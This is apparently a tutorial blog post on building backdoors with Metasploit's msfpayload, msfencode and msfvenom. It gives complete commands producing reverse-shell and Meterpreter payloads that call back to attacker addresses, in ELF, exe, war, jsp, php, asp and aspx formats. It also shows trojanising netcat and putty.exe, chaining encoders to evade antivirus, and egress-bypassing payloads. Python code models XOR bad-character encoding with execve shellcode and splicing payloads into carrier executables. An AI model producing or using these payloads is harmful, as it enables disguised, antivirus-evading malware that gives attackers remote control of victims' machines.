These are notes I wrote some time ago; I did not have an environment to test them thoroughly. This article covers generating backdoors with msfpayload and encoding the payload with msfencode so that it evades some antivirus products.
msfpayload and msfencode parameters
Run msfpayload -h to see the available parameters:
Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
#O -- show payload information and options (the [S]ummary selector in the usage line above)
#R -- output raw bytes, which can be piped to another program such as msfencode or redirected to a file
#C -- output the payload as a C array
Run msfencode -h to see its parameters:
root@bt:/opt/metasploit/msf3# msfencode -h
Usage: /opt/metasploit/msf3/msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff' // bytes that must not appear in the encoded output
-c <opt> The number of times to encode the data // number of encoding iterations
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use // which encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders // list all available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file // output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war // output file format
-v Increase verbosity
-x <opt> Specify an alternate executable template
root@bt:/opt/metasploit/msf3# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
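Most of the encoders listed above are XOR-family encoders, and the -e, -b and -c options in the msfencode help decide which one runs, which bytes it must never emit, and how many passes it makes. The following is an added example, not Metasploit code: a single-byte XOR model of that loop (the data transform only, without the x86 decoder stub a real encoder prepends), with the key search that the -b list forces, stacked -c iterations, and a renderer for the C output format mentioned with the msfpayload options. The sample buffer and the bad-character set are constructed for the example.

```python
"""Model of what msfencode's -e, -b and -c options do, as an added example
(not Metasploit code).  A real x86 encoder prepends a decoder stub that
undoes the transform at run time; this model keeps only the data
transform, so the effect of the options can be checked offline."""


def parse_badchars(spec: str) -> bytes:
    r"""Turn a -b style string such as '\x00\x0a\x0d' into bytes."""
    return bytes(int(tok, 16) for tok in spec.split("\\x") if tok)


def has_bad_bytes(data: bytes, bad: bytes) -> bool:
    """True if any byte of data is in the bad-character set."""
    return any(b in bad for b in data)


def find_xor_key(data: bytes, bad: bytes) -> int:
    """Pick a single-byte key so that neither the key byte (it is emitted
    in clear, as the real decoder stub carries it) nor any encoded byte
    lands in the bad-character set.  This is the search that -b forces;
    it fails when no key satisfies the constraint."""
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in data):
            return key
    raise ValueError("no single-byte XOR key avoids the bad characters")


def xor_encode(data: bytes, bad: bytes, iterations: int = 1):
    """One pass per -c iteration: choose a key for the current buffer,
    XOR it, and prepend the key byte.  Later passes re-encode the earlier
    key byte as well, which is why iterations stack."""
    buf = bytes(data)
    keys = []
    for _ in range(iterations):
        key = find_xor_key(buf, bad)
        buf = bytes([key]) + bytes(b ^ key for b in buf)
        keys.append(key)
    return buf, keys


def xor_decode(buf: bytes, iterations: int) -> bytes:
    """Reverse of xor_encode: what the stacked decoder stubs do at run time."""
    for _ in range(iterations):
        key, body = buf[0], buf[1:]
        buf = bytes(b ^ key for b in body)
    return buf


def to_c(buf: bytes, name: str = "buf", width: int = 16) -> str:
    """Render bytes the way the C output format does: an unsigned char
    array of \\xNN escapes, wrapped every `width` bytes."""
    lines = ['"' + "".join(f"\\x{b:02x}" for b in buf[i:i + width]) + '"'
             for i in range(0, len(buf), width)]
    return f"unsigned char {name}[] =\n" + "\n".join(lines) + ";\n"


# Constructed sample input: the classic 23-byte Linux x86 execve("/bin/sh")
# stub followed by three deliberately bad bytes (NUL, CR, LF), so the raw
# buffer would be cut short by a C string copy or mangled by a text protocol.
RAW = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80") + b"\x00\x0d\x0a"
BAD = parse_badchars(r"\x00\x0a\x0d")


if __name__ == "__main__":
    print("raw has bad bytes:", has_bad_bytes(RAW, BAD))
    enc, keys = xor_encode(RAW, BAD, iterations=3)
    print("keys per iteration:", keys)
    print("encoded has bad bytes:", has_bad_bytes(enc, BAD))
    print("round trip ok:", xor_decode(enc, 3) == RAW)
    print(to_c(enc))
```

Running it prints the key chosen on each pass and the final buffer as a C array. When find_xor_key raises, that is the same situation in which msfencode reports that no encoder succeeded for the given -b list; the usual answers are a different encoder or a shorter bad-character list, not more iterations.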
Backdoor types: asp, aspx, php, jsp, war, exe and others can be generated; the usages described below are not each tested here.
Generating a Linux backdoor with msfpayload
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
Created by msfpayload (http://www.).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"192.168.7.102", "LPORT"=>"5555"}
Run linux2 on the target and listen on the port on your own machine, either with Metasploit (exploit/multi/handler) or with nc; the test is shown in the figure (not reproduced here).
Binding the payload to an existing executable, e.g. netcat:
root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
[*] x86/alpha_mixed succeeded with size 204 (iteration=1)
Check the result before relying on it: -k/-x template injection was written around Windows PE templates, so confirm that the produced ELF still behaves as netcat and still connects back.
A more advanced payload, Meterpreter: the same pipeline with the Linux Meterpreter payload linux/x86/meterpreter/reverse_tcp:
root@bt:~# msfpayload linux/x86/meterpreter/reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
Use msfpayload -l | grep linux to list the Linux payloads and pick the one that fits.
Generating jsp and war backdoors with msfpayload
root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp
Generating a war-format backdoor:
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
Created by msfpayload (http://www.).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"10.0.0.1", "LPORT"=>"5555"}
root@bt:~# unzip door.war
Archive: door.war
inflating: META-INF/MANIFEST.MF
creating: WEB-INF/
inflating: WEB-INF/web.xml
inflating: sbkuvbujlbr.jsp
inflating: sWDYKoedyqBMERb.txt
The randomly named .txt entry is the payload binary; the randomly named .jsp is a dropper that writes it to disk and executes it when the page is requested, so both entries must stay in the archive.
Generating a php backdoor with msfpayload
root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
[*] php/base64 succeeded with size 1779 (iteration=1)
If the file does not start with <?php and end with ?>, open base64php.php in gedit/vim and add the tags at the beginning and end by hand, otherwise it will not run. See the figure (not reproduced here).
Generating asp and aspx backdoors with msfpayload
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
Generating an exe backdoor with msfpayload
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 > shell.bin
Chaining several encoders, each for a couple of iterations:
root@bt:~#msfpayload windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o door.exe
msfpayload tips: when the target sits on an internal network behind egress filtering, commonly chosen payloads are reverse_tcp_allports (tries outbound ports one after another until one connects) and reverse_http (tunnels over HTTP):
root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe
root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe
Antivirus sandbox evasion with ultimate-payload.pl:
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367)
[*ultimate] Payload: encode (new size: 1161)
[*ultimate] Template: read 94720 bytes from file
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928
[*ultimate] Output: add the begin of the template (size: 36928)
[*ultimate] Output: add the encoded payload (size: 1161)
[*ultimate] Output: add the end of the template (size: 18502)
[*ultimate] File '/tmp/payload.exe' generated (size: 94720)
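The log above is a marker-based splice: the tool finds 'MY_PAYLOAD:' in the template, emits the template bytes before it, then the encoded payload, then the bytes after it, and ends with a file of the template's original size. The following is an added example, not ultimate-payload.pl's code: a Python model of that splice over a constructed carrier. The slot layout (marker followed by a zero-filled reserve), the 4-byte little-endian length prefix and the single-byte XOR are this model's assumptions standing in for the tool's own encoding; the size check is the part worth keeping.

```python
"""Model of the marker-based template splice that ultimate-payload.pl logs
above (find 'MY_PAYLOAD:', emit template head, encoded payload, template
tail, same total size).  Added example, not that tool's code: the carrier
is a constructed byte string, and the slot layout, the length prefix and
the XOR key are assumptions of this model."""
import struct

MARKER = b"MY_PAYLOAD:"
KEY = 0x5A  # assumed toy encoding key; a real carrier's stub holds its own


def build_template(reserve: int = 64) -> bytes:
    """Constructed stand-in for a carrier executable: leading bytes, the
    marker, a zero-filled reserve for the payload, trailing bytes."""
    return b"HEAD" * 8 + MARKER + b"\x00" * reserve + b"TAIL" * 8


def xor_bytes(data: bytes, key: int = KEY) -> bytes:
    """Single-byte XOR used as the model's (reversible) encoding."""
    return bytes(b ^ key for b in data)


def slot_bounds(template: bytes) -> tuple:
    """Locate the marker and the zero-filled reserve that follows it;
    returns (start, end) of the region that will be overwritten."""
    pos = template.find(MARKER)
    if pos < 0:
        raise ValueError("marker not found in template")
    end = pos + len(MARKER)
    while end < len(template) and template[end] == 0:
        end += 1
    return pos, end


def splice(template: bytes, payload: bytes) -> bytes:
    """Overwrite marker + reserve with [len][xor(payload)][zero padding] so
    the output keeps the template's size; refuse payloads that do not fit,
    which is the check to run before shipping a carrier."""
    pos, end = slot_bounds(template)
    encoded = xor_bytes(payload)
    body = struct.pack("<I", len(encoded)) + encoded
    if len(body) > end - pos:
        raise ValueError(f"payload needs {len(body)} bytes, slot holds {end - pos}")
    body += b"\x00" * (end - pos - len(body))
    return template[:pos] + body + template[end:]


def extract(image: bytes, pos: int) -> bytes:
    """What the carrier's loader stub would do at run time: read the length
    word at the old marker position, then decode that many bytes."""
    (n,) = struct.unpack_from("<I", image, pos)
    return xor_bytes(image[pos + 4:pos + 4 + n])


# Constructed sample payload (not real shellcode): 40 bytes with embedded
# NULs, to show that the length prefix, not a terminator, delimits it.
SAMPLE_PAYLOAD = b"\xfc\x00\x00\x48\x83\xe4\xf0" + b"sample" + b"\x00" * 27


if __name__ == "__main__":
    tpl = build_template()
    pos, _ = slot_bounds(tpl)
    out = splice(tpl, SAMPLE_PAYLOAD)
    print("template size", len(tpl), "output size", len(out))
    print("marker removed:", MARKER not in out)
    print("payload recovered:", extract(out, pos) == SAMPLE_PAYLOAD)
```

The reserve size is the limit the msfvenom -f raw stage has to respect: an encoded payload larger than the slot cannot be spliced without rebuilding the carrier, which is why the tool logs both the encoded size and the template size.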
reverse_https with basic authentication against a proxy:
msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe
The generated payload can also be packed, e.g. with upx.
PS: this is only a brief introduction to usage; the details still need to be tested by you. To view the shellcode itself, use the C output format. Please leave a comment if you find errors.